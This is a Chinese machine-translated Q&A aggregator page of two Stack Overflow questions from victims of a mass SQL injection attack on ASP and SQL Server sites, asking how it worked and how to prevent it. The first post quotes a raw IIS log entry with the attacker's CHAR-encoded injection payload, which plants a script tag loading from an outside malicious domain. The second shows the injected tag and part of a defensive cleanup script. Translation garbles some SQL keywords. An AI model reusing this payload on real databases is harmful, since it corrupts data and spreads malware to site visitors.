那些遇到过的问题

相关疑难解决方法(0)

攻击使用SQL Server数据库的ASP站点

我们有一个显然受到攻击的调查网站.症状与本网站的以下页面中描述的症状相同: ASP.NET网站上的XSS攻击.

我在IIS日志中发现了多个包含恶意代码的条目:

</ title> <script src = http:// google-stats49.info/ur.php>.

以下是其中一个IIS日志条目的cs-uri-query字段值的示例.

surveyID = 91 +更新+ usd_ResponseDetails +设定+类别名称= REPLACE(铸造(类别名称+为+ VARCHAR(8000)),流延(CHAR(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar( 116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar( 116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar( 58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar( 115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar( 102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar( 60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+为+ VARCHAR(8000)) ,铸(CHAR(32)+ AS + VARCHAR(8))) -

我不明白上面的代码是如何工作的,但显然这是在查询字符串中发送的内容,以破坏我们的数据库表中的列.我们暂时关闭了我们的网站.我们可以从数据库中删除脚本,但这并不能防止它在我们将网站重新联机时再次损坏.

有没有人对如何防止这种情况发生任何建议?

javascript sql-server asp-classic query-string

Dav*_*vid
2017 05-23
10
推荐指数
1
解决办法
1万
查看次数

解读这个XSS攻击

有没有人知道有关此攻击的更多信息?

我最近在我的网站上注入了这个脚本

顺便说一句,不要去这个网站,因为它是感染的来源

 </title><script src=http://google-stats50.**fo/***.php>
Run Code Online (Sandbox Code Playgroud)

什么样的攻击,SQL或CODE?

顺便说一句,不要去这个网站,因为它是感染的来源

问题是这种传染性攻击发生了什么样的攻击?

我们发现它,并不像twitter攻击,它是通过url中的请求参数并直接在参数中注入sql.

我们的sql团队生成了一个SQL脚本来清理被感染的数据库

/*************************************************************************
        SQL INJECTED DATABASE
*************************************************************************/

DECLARE @dbName VARCHAR(200), 
        @SqlString NVARCHAR(MAX), 
        @SearchText VARCHAR(MAX), 
        @SearchTextLike VARCHAR(MAX), 
        @NbItems INT, 
        @TableName VARCHAR(255), 
        @ColoneName VARCHAR(255), 
        @objId BIGINT,
        @tmpSqlString NVARCHAR(MAX),
        @CleanUp BIT,
        @RowCount BIGINT,
        @debug BIT,
        @Msg VARCHAR(MAX);

SET @debug = 0; -- 1 = Additionnal prints

SET @CleanUp = 0; -- 1 = Update tables

SET @SearchText = '</title><script src=http://google-stats50.info/ur.php></script>';

SET @SearchTextLike = '%' + @SearchText + '%';

DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), …
Run Code Online (Sandbox Code Playgroud)

security iis sql-injection

Céd*_*vin
2014 08-31
9
推荐指数
1
解决办法
3638
查看次数

标签 统计

asp-classic ×1

iis ×1

javascript ×1

query-string ×1

security ×1

sql-injection ×1

sql-server ×1